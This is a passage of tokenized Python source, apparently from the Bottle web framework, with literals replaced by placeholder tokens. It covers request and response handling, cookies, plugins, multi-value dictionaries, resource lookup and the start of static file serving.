, '<STR_LIT:filename>' ) : <EOL> files [ name ] = item <EOL> return files <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def json ( self ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT:application/json>' in self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) and <NUM_LIT:0> < self . content_length < self . MEMFILE_MAX : <EOL> return json_loads ( self . body . read ( self . MEMFILE_MAX ) ) <EOL> return None <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def _body ( self ) : <EOL> maxread = max ( <NUM_LIT:0> , self . content_length ) <EOL> stream = self . environ [ '<STR_LIT>' ] <EOL> body = BytesIO ( ) if maxread < self . MEMFILE_MAX else TemporaryFile ( mode = '<STR_LIT>' ) <EOL> while maxread > <NUM_LIT:0> : <EOL> part = stream . read ( min ( maxread , self . MEMFILE_MAX ) ) <EOL> if not part : break <EOL> body . write ( part ) <EOL> maxread -= len ( part ) <EOL> self . environ [ '<STR_LIT>' ] = body <EOL> body . seek ( <NUM_LIT:0> ) <EOL> return body <EOL> @ property <EOL> def body ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _body . seek ( <NUM_LIT:0> ) <EOL> return self . _body <EOL> GET = query <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def POST ( self ) : <EOL> """<STR_LIT>""" <EOL> post = FormsDict ( ) <EOL> safe_env = { '<STR_LIT>' : '<STR_LIT>' } <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if key in self . environ : safe_env [ key ] = self . environ [ key ] <EOL> if NCTextIOWrapper : <EOL> fb = NCTextIOWrapper ( self . body , encoding = '<STR_LIT>' , newline = '<STR_LIT:\n>' ) <EOL> else : <EOL> fb = self . body <EOL> data = cgi . FieldStorage ( fp = fb , environ = safe_env , keep_blank_values = True ) <EOL> for item in ( data . list or [ ] ) [ : self . MAX_PARAMS ] : <EOL> post [ item . name ] = item if item . filename else item . value <EOL> return post <EOL> @ property <EOL> def COOKIES ( self ) : <EOL> '''<STR_LIT>''' <EOL> depr ( '<STR_LIT>' ) <EOL> return self . cookies <EOL> @ property <EOL> def url ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . urlparts . geturl ( ) <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def urlparts ( self ) : <EOL> '''<STR_LIT>''' <EOL> env = self . environ <EOL> http = env . get ( '<STR_LIT>' , '<STR_LIT:http>' ) <EOL> host = env . get ( '<STR_LIT>' ) or env . get ( '<STR_LIT>' ) <EOL> if not host : <EOL> host = env . get ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' ) <EOL> port = env . get ( '<STR_LIT>' ) <EOL> if port and port != ( '<STR_LIT>' if http == '<STR_LIT:http>' else '<STR_LIT>' ) : <EOL> host += '<STR_LIT::>' + port <EOL> path = urlquote ( self . fullpath ) <EOL> return UrlSplitResult ( http , host , path , env . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> @ property <EOL> def fullpath ( self ) : <EOL> """<STR_LIT>""" <EOL> return urljoin ( self . script_name , self . path . lstrip ( '<STR_LIT:/>' ) ) <EOL> @ property <EOL> def query_string ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ property <EOL> def script_name ( self ) : <EOL> '''<STR_LIT>''' <EOL> script_name = self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) <EOL> return '<STR_LIT:/>' + script_name + '<STR_LIT:/>' if script_name else '<STR_LIT:/>' <EOL> def path_shift ( self , shift = <NUM_LIT:1> ) : <EOL> '''<STR_LIT>''' <EOL> script = self . environ . get ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> self [ '<STR_LIT>' ] , self [ '<STR_LIT>' ] = path_shift ( script , self . path , shift ) <EOL> @ property <EOL> def content_length ( self ) : <EOL> '''<STR_LIT>''' <EOL> return int ( self . environ . get ( '<STR_LIT>' ) or - <NUM_LIT:1> ) <EOL> @ property <EOL> def is_xhr ( self ) : <EOL> '''<STR_LIT>''' <EOL> requested_with = self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return requested_with . lower ( ) == '<STR_LIT>' <EOL> @ property <EOL> def is_ajax ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . is_xhr <EOL> @ property <EOL> def auth ( self ) : <EOL> """<STR_LIT>""" <EOL> basic = parse_auth ( self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if basic : return basic <EOL> ruser = self . environ . get ( '<STR_LIT>' ) <EOL> if ruser : return ( ruser , None ) <EOL> return None <EOL> @ property <EOL> def remote_route ( self ) : <EOL> """<STR_LIT>""" <EOL> proxy = self . environ . get ( '<STR_LIT>' ) <EOL> if proxy : return [ ip . strip ( ) for ip in proxy . split ( '<STR_LIT:U+002C>' ) ] <EOL> remote = self . environ . get ( '<STR_LIT>' ) <EOL> return [ remote ] if remote else [ ] <EOL> @ property <EOL> def remote_addr ( self ) : <EOL> """<STR_LIT>""" <EOL> route = self . remote_route <EOL> return route [ <NUM_LIT:0> ] if route else None <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return Request ( self . environ . copy ( ) ) <EOL> def get ( self , value , default = None ) : return self . environ . get ( value , default ) <EOL> def __getitem__ ( self , key ) : return self . environ [ key ] <EOL> def __delitem__ ( self , key ) : self [ key ] = "<STR_LIT>" ; del ( self . environ [ key ] ) <EOL> def __iter__ ( self ) : return iter ( self . environ ) <EOL> def __len__ ( self ) : return len ( self . environ ) <EOL> def keys ( self ) : return self . environ . keys ( ) <EOL> def __setitem__ ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> if self . environ . get ( '<STR_LIT>' ) : <EOL> raise KeyError ( '<STR_LIT>' ) <EOL> self . environ [ key ] = value <EOL> todelete = ( ) <EOL> if key == '<STR_LIT>' : <EOL> todelete = ( '<STR_LIT:body>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif key == '<STR_LIT>' : <EOL> todelete = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif key . startswith ( '<STR_LIT>' ) : <EOL> todelete = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for key in todelete : <EOL> self . environ . pop ( '<STR_LIT>' + key , None ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , self . method , self . url ) <EOL> def __getattr__ ( self , name ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> var = self . environ [ '<STR_LIT>' % name ] <EOL> return var . __get__ ( self ) if hasattr ( var , '<STR_LIT>' ) else var <EOL> except KeyError : <EOL> raise AttributeError ( '<STR_LIT>' % name ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == '<STR_LIT>' : return object . __setattr__ ( self , name , value ) <EOL> self . environ [ '<STR_LIT>' % name ] = value <EOL> def _hkey ( s ) : <EOL> return s . title ( ) . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) <EOL> class HeaderProperty ( object ) : <EOL> def __init__ ( self , name , reader = None , writer = str , default = '<STR_LIT>' ) : <EOL> self . name , self . reader , self . writer , self . default = name , reader , writer , default <EOL> self . __doc__ = '<STR_LIT>' % name . title ( ) <EOL> def __get__ ( self , obj , cls ) : <EOL> if obj is None : return self <EOL> value = obj . headers . get ( self . name ) <EOL> return self . reader ( value ) if ( value and self . reader ) else ( value or self . default ) <EOL> def __set__ ( self , obj , value ) : <EOL> if self . writer : value = self . writer ( value ) <EOL> obj . headers [ self . name ] = value <EOL> def __delete__ ( self , obj ) : <EOL> if self . name in obj . headers : <EOL> del obj . headers [ self . name ] <EOL> class BaseResponse ( object ) : <EOL> """<STR_LIT>""" <EOL> default_status = <NUM_LIT:200> <EOL> default_content_type = '<STR_LIT>' <EOL> bad_headers = { <EOL> <NUM_LIT> : set ( ( '<STR_LIT:Content-Type>' , ) ) , <EOL> <NUM_LIT> : set ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:Content-Type>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) } <EOL> def __init__ ( self , body = '<STR_LIT>' , status = None , ** headers ) : <EOL> self . _status_line = None <EOL> self . _status_code = None <EOL> self . _cookies = None <EOL> self . _headers = { '<STR_LIT:Content-Type>' : [ self . default_content_type ] } <EOL> self . body = body <EOL> self . status = status or self . default_status <EOL> if headers : <EOL> for name , value in headers . items ( ) : <EOL> self [ name ] = value <EOL> def copy ( self ) : <EOL> '''<STR_LIT>''' <EOL> copy = Response ( ) <EOL> copy . status = self . status <EOL> copy . _headers = dict ( ( k , v [ : ] ) for ( k , v ) in self . _headers . items ( ) ) <EOL> return copy <EOL> def __iter__ ( self ) : <EOL> return iter ( self . body ) <EOL> def close ( self ) : <EOL> if hasattr ( self . body , '<STR_LIT>' ) : <EOL> self . body . close ( ) <EOL> @ property <EOL> def status_line ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _status_line <EOL> @ property <EOL> def status_code ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _status_code <EOL> def _set_status ( self , status ) : <EOL> if isinstance ( status , int ) : <EOL> code , status = status , _HTTP_STATUS_LINES . get ( status ) <EOL> elif '<STR_LIT:U+0020>' in status : <EOL> status = status . strip ( ) <EOL> code = int ( status . split ( ) [ <NUM_LIT:0> ] ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not <NUM_LIT:100> <= code <= <NUM_LIT> : raise ValueError ( '<STR_LIT>' ) <EOL> self . _status_code = code <EOL> self . _status_line = status or ( '<STR_LIT>' % code ) <EOL> def _get_status ( self ) : <EOL> return self . _status_line <EOL> status = property ( _get_status , _set_status , None , <EOL> '''<STR_LIT>''' ) <EOL> del _get_status , _set_status <EOL> @ property <EOL> def headers ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . __dict__ [ '<STR_LIT>' ] = hdict = HeaderDict ( ) <EOL> hdict . dict = self . _headers <EOL> return hdict <EOL> def __contains__ ( self , name ) : return _hkey ( name ) in self . _headers <EOL> def __delitem__ ( self , name ) : del self . _headers [ _hkey ( name ) ] <EOL> def __getitem__ ( self , name ) : return self . _headers [ _hkey ( name ) ] [ - <NUM_LIT:1> ] <EOL> def __setitem__ ( self , name , value ) : self . _headers [ _hkey ( name ) ] = [ str ( value ) ] <EOL> def get_header ( self , name , default = None ) : <EOL> '''<STR_LIT>''' <EOL> return self . _headers . get ( _hkey ( name ) , [ default ] ) [ - <NUM_LIT:1> ] <EOL> def set_header ( self , name , value , append = False ) : <EOL> '''<STR_LIT>''' <EOL> if append : <EOL> self . add_header ( name , value ) <EOL> else : <EOL> self . _headers [ _hkey ( name ) ] = [ str ( value ) ] <EOL> def add_header ( self , name , value ) : <EOL> '''<STR_LIT>''' <EOL> self . _headers . setdefault ( _hkey ( name ) , [ ] ) . append ( str ( value ) ) <EOL> def iter_headers ( self ) : <EOL> '''<STR_LIT>''' <EOL> headers = self . _headers . items ( ) <EOL> bad_headers = self . bad_headers . get ( self . _status_code ) <EOL> if bad_headers : <EOL> headers = [ h for h in headers if h [ <NUM_LIT:0> ] not in bad_headers ] <EOL> for name , values in headers : <EOL> for value in values : <EOL> yield name , value <EOL> if self . _cookies : <EOL> for c in self . _cookies . values ( ) : <EOL> yield '<STR_LIT>' , c . OutputString ( ) <EOL> def wsgiheader ( self ) : <EOL> depr ( '<STR_LIT>' ) <EOL> return self . headerlist <EOL> @ property <EOL> def headerlist ( self ) : <EOL> '''<STR_LIT>''' <EOL> return list ( self . iter_headers ( ) ) <EOL> content_type = HeaderProperty ( '<STR_LIT:Content-Type>' ) <EOL> content_length = HeaderProperty ( '<STR_LIT>' , reader = int ) <EOL> @ property <EOL> def charset ( self ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in self . content_type : <EOL> return self . content_type . split ( '<STR_LIT>' ) [ - <NUM_LIT:1> ] . split ( '<STR_LIT:;>' ) [ <NUM_LIT:0> ] . strip ( ) <EOL> return '<STR_LIT>' <EOL> @ property <EOL> def COOKIES ( self ) : <EOL> """<STR_LIT>""" <EOL> depr ( '<STR_LIT>' ) <EOL> if not self . _cookies : <EOL> self . _cookies = SimpleCookie ( ) <EOL> return self . _cookies <EOL> def set_cookie ( self , name , value , secret = None , ** options ) : <EOL> '''<STR_LIT>''' <EOL> if not self . _cookies : <EOL> self . _cookies = SimpleCookie ( ) <EOL> if secret : <EOL> value = touni ( cookie_encode ( ( name , value ) , secret ) ) <EOL> elif not isinstance ( value , basestring ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if len ( value ) > <NUM_LIT> : raise ValueError ( '<STR_LIT>' ) <EOL> self . _cookies [ name ] = value <EOL> for key , value in options . items ( ) : <EOL> if key == '<STR_LIT>' : <EOL> if isinstance ( value , timedelta ) : <EOL> value = value . seconds + value . days * <NUM_LIT> * <NUM_LIT> <EOL> if key == '<STR_LIT>' : <EOL> if isinstance ( value , ( datedate , datetime ) ) : <EOL> value = value . timetuple ( ) <EOL> elif isinstance ( value , ( int , float ) ) : <EOL> value = time . gmtime ( value ) <EOL> value = time . strftime ( "<STR_LIT>" , value ) <EOL> self . _cookies [ name ] [ key . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) ] = value <EOL> def delete_cookie ( self , key , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> kwargs [ '<STR_LIT>' ] = - <NUM_LIT:1> <EOL> kwargs [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . set_cookie ( key , '<STR_LIT>' , ** kwargs ) <EOL> def __repr__ ( self ) : <EOL> out = '<STR_LIT>' <EOL> for name , value in self . headerlist : <EOL> out += '<STR_LIT>' % ( name . title ( ) , value . strip ( ) ) <EOL> return out <EOL> _lctx = threading . local ( ) <EOL> def local_property ( name ) : <EOL> return property ( lambda self : getattr ( _lctx , name ) , <EOL> lambda self , value : setattr ( _lctx , name , value ) , <EOL> lambda self : delattr ( _lctx , name ) , <EOL> '<STR_LIT>' % name ) <EOL> class LocalRequest ( BaseRequest ) : <EOL> '''<STR_LIT>''' <EOL> bind = BaseRequest . __init__ <EOL> environ = local_property ( '<STR_LIT>' ) <EOL> class LocalResponse ( BaseResponse ) : <EOL> '''<STR_LIT>''' <EOL> bind = BaseResponse . __init__ <EOL> _status_line = local_property ( '<STR_LIT>' ) <EOL> _status_code = local_property ( '<STR_LIT>' ) <EOL> _cookies = local_property ( '<STR_LIT>' ) <EOL> _headers = local_property ( '<STR_LIT>' ) <EOL> body = local_property ( '<STR_LIT>' ) <EOL> Response = LocalResponse <EOL> Request = LocalRequest <EOL> class PluginError ( BottleException ) : pass <EOL> class JSONPlugin ( object ) : <EOL> name = '<STR_LIT>' <EOL> api = <NUM_LIT:2> <EOL> def __init__ ( self , json_dumps = json_dumps ) : <EOL> self . json_dumps = json_dumps <EOL> def apply ( self , callback , context ) : <EOL> dumps = self . json_dumps <EOL> if not dumps : return callback <EOL> def wrapper ( * a , ** ka ) : <EOL> rv = callback ( * a , ** ka ) <EOL> if isinstance ( rv , dict ) : <EOL> json_response = dumps ( rv ) <EOL> response . content_type = '<STR_LIT:application/json>' <EOL> return json_response <EOL> return rv <EOL> return wrapper <EOL> class HooksPlugin ( object ) : <EOL> name = '<STR_LIT>' <EOL> api = <NUM_LIT:2> <EOL> _names = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> self . hooks = dict ( ( name , [ ] ) for name in self . _names ) <EOL> self . app = None <EOL> def _empty ( self ) : <EOL> return not ( self . hooks [ '<STR_LIT>' ] or self . hooks [ '<STR_LIT>' ] ) <EOL> def setup ( self , app ) : <EOL> self . app = app <EOL> def add ( self , name , func ) : <EOL> '''<STR_LIT>''' <EOL> was_empty = self . _empty ( ) <EOL> self . hooks . setdefault ( name , [ ] ) . append ( func ) <EOL> if self . app and was_empty and not self . _empty ( ) : self . app . reset ( ) <EOL> def remove ( self , name , func ) : <EOL> '''<STR_LIT>''' <EOL> was_empty = self . _empty ( ) <EOL> if name in self . hooks and func in self . hooks [ name ] : <EOL> self . hooks [ name ] . remove ( func ) <EOL> if self . app and not was_empty and self . _empty ( ) : self . app . reset ( ) <EOL> def trigger ( self , name , * a , ** ka ) : <EOL> '''<STR_LIT>''' <EOL> hooks = self . hooks [ name ] <EOL> if ka . pop ( '<STR_LIT>' , False ) : hooks = hooks [ : : - <NUM_LIT:1> ] <EOL> return [ hook ( * a , ** ka ) for hook in hooks ] <EOL> def apply ( self , callback , context ) : <EOL> if self . _empty ( ) : return callback <EOL> def wrapper ( * a , ** ka ) : <EOL> self . trigger ( '<STR_LIT>' ) <EOL> rv = callback ( * a , ** ka ) <EOL> self . trigger ( '<STR_LIT>' , reversed = True ) <EOL> return rv <EOL> return wrapper <EOL> class TemplatePlugin ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> api = <NUM_LIT:2> <EOL> def apply ( self , callback , route ) : <EOL> conf = route . config . get ( '<STR_LIT>' ) <EOL> if isinstance ( conf , ( tuple , list ) ) and len ( conf ) == <NUM_LIT:2> : <EOL> return view ( conf [ <NUM_LIT:0> ] , ** conf [ <NUM_LIT:1> ] ) ( callback ) <EOL> elif isinstance ( conf , str ) and '<STR_LIT>' in route . config : <EOL> depr ( '<STR_LIT>' ) <EOL> return view ( conf , ** route . config [ '<STR_LIT>' ] ) ( callback ) <EOL> elif isinstance ( conf , str ) : <EOL> return view ( conf ) ( callback ) <EOL> else : <EOL> return callback <EOL> class _ImportRedirect ( object ) : <EOL> def __init__ ( self , name , impmask ) : <EOL> '''<STR_LIT>''' <EOL> self . name = name <EOL> self . impmask = impmask <EOL> self . module = sys . modules . setdefault ( name , imp . new_module ( name ) ) <EOL> self . module . __dict__ . update ( { '<STR_LIT>' : __file__ , '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , '<STR_LIT>' : self } ) <EOL> sys . meta_path . append ( self ) <EOL> def find_module ( self , fullname , path = None ) : <EOL> if '<STR_LIT:.>' not in fullname : return <EOL> packname , modname = fullname . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> if packname != self . name : return <EOL> return self <EOL> def load_module ( self , fullname ) : <EOL> if fullname in sys . modules : return sys . modules [ fullname ] <EOL> packname , modname = fullname . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> realname = self . impmask % modname <EOL> __import__ ( realname ) <EOL> module = sys . modules [ fullname ] = sys . modules [ realname ] <EOL> setattr ( self . module , modname , module ) <EOL> module . __loader__ = self <EOL> return module <EOL> class MultiDict ( DictMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * a , ** k ) : <EOL> self . dict = dict ( ( k , [ v ] ) for ( k , v ) in dict ( * a , ** k ) . items ( ) ) <EOL> def __len__ ( self ) : return len ( self . dict ) <EOL> def __iter__ ( self ) : return iter ( self . dict ) <EOL> def __contains__ ( self , key ) : return key in self . dict <EOL> def __delitem__ ( self , key ) : del self . dict [ key ] <EOL> def __getitem__ ( self , key ) : return self . dict [ key ] [ - <NUM_LIT:1> ] <EOL> def __setitem__ ( self , key , value ) : self . append ( key , value ) <EOL> def keys ( self ) : return self . dict . keys ( ) <EOL> if py3k : <EOL> def values ( self ) : return ( v [ - <NUM_LIT:1> ] for v in self . dict . values ( ) ) <EOL> def items ( self ) : return ( ( k , v [ - <NUM_LIT:1> ] ) for k , v in self . dict . items ( ) ) <EOL> def allitems ( self ) : <EOL> return ( ( k , v ) for k , vl in self . dict . items ( ) for v in vl ) <EOL> iterkeys = keys <EOL> itervalues = values <EOL> iteritems = items <EOL> iterallitems = allitems <EOL> else : <EOL> def values ( self ) : return [ v [ - <NUM_LIT:1> ] for v in self . dict . values ( ) ] <EOL> def items ( self ) : return [ ( k , v [ - <NUM_LIT:1> ] ) for k , v in self . dict . items ( ) ] <EOL> def iterkeys ( self ) : return self . dict . iterkeys ( ) <EOL> def itervalues ( self ) : return ( v [ - <NUM_LIT:1> ] for v in self . dict . itervalues ( ) ) <EOL> def iteritems ( self ) : <EOL> return ( ( k , v [ - <NUM_LIT:1> ] ) for k , v in self . dict . iteritems ( ) ) <EOL> def iterallitems ( self ) : <EOL> return ( ( k , v ) for k , vl in self . dict . iteritems ( ) for v in vl ) <EOL> def allitems ( self ) : <EOL> return [ ( k , v ) for k , vl in self . dict . iteritems ( ) for v in vl ] <EOL> def get ( self , key , default = None , index = - <NUM_LIT:1> , type = None ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> val = self . dict [ key ] [ index ] <EOL> return type ( val ) if type else val <EOL> except Exception : <EOL> pass <EOL> return default <EOL> def append ( self , key , value ) : <EOL> '''<STR_LIT>''' <EOL> self . dict . setdefault ( key , [ ] ) . append ( value ) <EOL> def replace ( self , key , value ) : <EOL> '''<STR_LIT>''' <EOL> self . dict [ key ] = [ value ] <EOL> def getall ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> return self . dict . get ( key ) or [ ] <EOL> getone = get <EOL> getlist = getall <EOL> class FormsDict ( MultiDict ) : <EOL> '''<STR_LIT>''' <EOL> input_encoding = '<STR_LIT:utf8>' <EOL> recode_unicode = True <EOL> def _fix ( self , s , encoding = None ) : <EOL> if isinstance ( s , unicode ) and self . recode_unicode : <EOL> s = s . encode ( '<STR_LIT>' ) <EOL> if isinstance ( s , bytes ) : <EOL> return s . decode ( encoding or self . input_encoding ) <EOL> return s <EOL> def decode ( self , encoding = None ) : <EOL> '''<STR_LIT>''' <EOL> copy = FormsDict ( ) <EOL> enc = copy . input_encoding = encoding or self . input_encoding <EOL> copy . recode_unicode = False <EOL> for key , value in self . allitems ( ) : <EOL> copy . append ( self . _fix ( key , enc ) , self . _fix ( value , enc ) ) <EOL> return copy <EOL> def getunicode ( self , name , default = None , encoding = None ) : <EOL> try : <EOL> return self . _fix ( self [ name ] , encoding ) <EOL> except ( UnicodeError , KeyError ) : <EOL> return default <EOL> def __getattr__ ( self , name , default = unicode ( ) ) : <EOL> return self . getunicode ( name , default = default ) <EOL> class HeaderDict ( MultiDict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * a , ** ka ) : <EOL> self . dict = { } <EOL> if a or ka : self . update ( * a , ** ka ) <EOL> def __contains__ ( self , key ) : return _hkey ( key ) in self . dict <EOL> def __delitem__ ( self , key ) : del self . dict [ _hkey ( key ) ] <EOL> def __getitem__ ( self , key ) : return self . dict [ _hkey ( key ) ] [ - <NUM_LIT:1> ] <EOL> def __setitem__ ( self , key , value ) : self . dict [ _hkey ( key ) ] = [ str ( value ) ] <EOL> def append ( self , key , value ) : <EOL> self . dict . setdefault ( _hkey ( key ) , [ ] ) . append ( str ( value ) ) <EOL> def replace ( self , key , value ) : self . dict [ _hkey ( key ) ] = [ str ( value ) ] <EOL> def getall ( self , key ) : return self . dict . get ( _hkey ( key ) ) or [ ] <EOL> def get ( self , key , default = None , index = - <NUM_LIT:1> ) : <EOL> return MultiDict . get ( self , _hkey ( key ) , default , index ) <EOL> def filter ( self , names ) : <EOL> for name in [ _hkey ( n ) for n in names ] : <EOL> if name in self . dict : <EOL> del self . dict [ name ] <EOL> class WSGIHeaderDict ( DictMixin ) : <EOL> '''<STR_LIT>''' <EOL> cgikeys = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , environ ) : <EOL> self . environ = environ <EOL> def _ekey ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> key = key . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) . upper ( ) <EOL> if key in self . cgikeys : <EOL> return key <EOL> return '<STR_LIT>' + key <EOL> def raw ( self , key , default = None ) : <EOL> '''<STR_LIT>''' <EOL> return self . environ . get ( self . _ekey ( key ) , default ) <EOL> def __getitem__ ( self , key ) : <EOL> return tonat ( self . environ [ self . _ekey ( key ) ] , '<STR_LIT>' ) <EOL> def __setitem__ ( self , key , value ) : <EOL> raise TypeError ( "<STR_LIT>" % self . __class__ ) <EOL> def __delitem__ ( self , key ) : <EOL> raise TypeError ( "<STR_LIT>" % self . __class__ ) <EOL> def __iter__ ( self ) : <EOL> for key in self . environ : <EOL> if key [ : <NUM_LIT:5> ] == '<STR_LIT>' : <EOL> yield key [ <NUM_LIT:5> : ] . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) . title ( ) <EOL> elif key in self . cgikeys : <EOL> yield key . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) . title ( ) <EOL> def keys ( self ) : return [ x for x in self ] <EOL> def __len__ ( self ) : return len ( self . keys ( ) ) <EOL> def __contains__ ( self , key ) : return self . _ekey ( key ) in self . environ <EOL> class ConfigDict ( dict ) : <EOL> '''<STR_LIT>''' <EOL> def __getattr__ ( self , key ) : <EOL> if key not in self and key [ <NUM_LIT:0> ] . isupper ( ) : <EOL> self [ key ] = ConfigDict ( ) <EOL> return self . get ( key ) <EOL> def __setattr__ ( self , key , value ) : <EOL> if hasattr ( dict , key ) : <EOL> raise AttributeError ( '<STR_LIT>' ) <EOL> if key in self and self [ key ] and isinstance ( self [ key ] , ConfigDict ) : <EOL> raise AttributeError ( '<STR_LIT>' ) <EOL> self [ key ] = value <EOL> def __delattr__ ( self , key ) : <EOL> if key in self : del self [ key ] <EOL> def __call__ ( self , * a , ** ka ) : <EOL> for key , value in dict ( * a , ** ka ) . items ( ) : setattr ( self , key , value ) <EOL> return self <EOL> class AppStack ( list ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self [ - <NUM_LIT:1> ] <EOL> def push ( self , value = None ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , Bottle ) : <EOL> value = Bottle ( ) <EOL> self . append ( value ) <EOL> return value <EOL> class WSGIFileWrapper ( object ) : <EOL> def __init__ ( self , fp , buffer_size = <NUM_LIT> * <NUM_LIT:64> ) : <EOL> self . fp , self . buffer_size = fp , buffer_size <EOL> for attr in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if hasattr ( fp , attr ) : setattr ( self , attr , getattr ( fp , attr ) ) <EOL> def __iter__ ( self ) : <EOL> buff , read = self . buffer_size , self . read <EOL> while True : <EOL> part = read ( buff ) <EOL> if not part : return <EOL> yield part <EOL> class ResourceManager ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , base = '<STR_LIT>' , opener = open , cachemode = '<STR_LIT:all>' ) : <EOL> self . opener = open <EOL> self . base = base <EOL> self . cachemode = cachemode <EOL> self . path = [ ] <EOL> self . cache = { } <EOL> def add_path ( self , path , base = None , index = None , create = False ) : <EOL> '''<STR_LIT>''' <EOL> base = os . path . abspath ( os . path . dirname ( base or self . base ) ) <EOL> path = os . path . abspath ( os . path . join ( base , os . path . dirname ( path ) ) ) <EOL> path += os . sep <EOL> if path in self . path : <EOL> self . path . remove ( path ) <EOL> if create and not os . path . isdir ( path ) : <EOL> os . mkdirs ( path ) <EOL> if index is None : <EOL> self . path . append ( path ) <EOL> else : <EOL> self . path . insert ( index , path ) <EOL> self . cache . clear ( ) <EOL> def __iter__ ( self ) : <EOL> '''<STR_LIT>''' <EOL> search = self . path [ : ] <EOL> while search : <EOL> path = search . pop ( ) <EOL> if not os . path . isdir ( path ) : continue <EOL> for name in os . listdir ( path ) : <EOL> full = os . path . join ( path , name ) <EOL> if os . path . isdir ( full ) : search . append ( full ) <EOL> else : yield full <EOL> def lookup ( self , name ) : <EOL> '''<STR_LIT>''' <EOL> if name not in self . cache or DEBUG : <EOL> for path in self . path : <EOL> fpath = os . path . join ( path , name ) <EOL> if os . path . isfile ( fpath ) : <EOL> if self . cachemode in ( '<STR_LIT:all>' , '<STR_LIT>' ) : <EOL> self . cache [ name ] = fpath <EOL> return fpath <EOL> if self . cachemode == '<STR_LIT:all>' : <EOL> self . cache [ name ] = None <EOL> return self . cache [ name ] <EOL> def open ( self , name , mode = '<STR_LIT:r>' , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> fname = self . lookup ( name ) <EOL> if not fname : raise IOError ( "<STR_LIT>" % name ) <EOL> return self . opener ( name , mode = mode , * args , ** kwargs ) <EOL> def abort ( code = <NUM_LIT> , text = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> raise HTTPError ( code , text ) <EOL> def redirect ( url , code = None ) : <EOL> """<STR_LIT>""" <EOL> if code is None : <EOL> code = <NUM_LIT> if request . get ( '<STR_LIT>' ) == "<STR_LIT>" else <NUM_LIT> <EOL> location = urljoin ( request . url , url ) <EOL> raise HTTPResponse ( "<STR_LIT>" , status = code , header = dict ( Location = location ) ) <EOL> def _file_iter_range ( fp , offset , bytes , maxread = <NUM_LIT> * <NUM_LIT> ) : <EOL> '''<STR_LIT>''' <EOL> fp . seek ( offset ) <EOL> while bytes > <NUM_LIT:0> : <EOL> part = fp . read ( min ( bytes , maxread ) ) <EOL> if not part : break <EOL> bytes -= len ( part ) <EOL> yield part <EOL> def static_file ( filename , root , mimetype = '<STR_LIT>' , download = False ) : <EOL> """<STR_LIT>""" <EOL> root = os . path . abspath ( root ) + os . sep <EOL> filename = os . path . abspath ( os . path . join ( root , filename . strip ( '<STR_LIT>' ) ) ) <EOL> header = dict ( ) <EOL> if not filename . startswith ( root ) : <EOL> return HTTPError ( <NUM_LIT> , "<STR_LIT>" 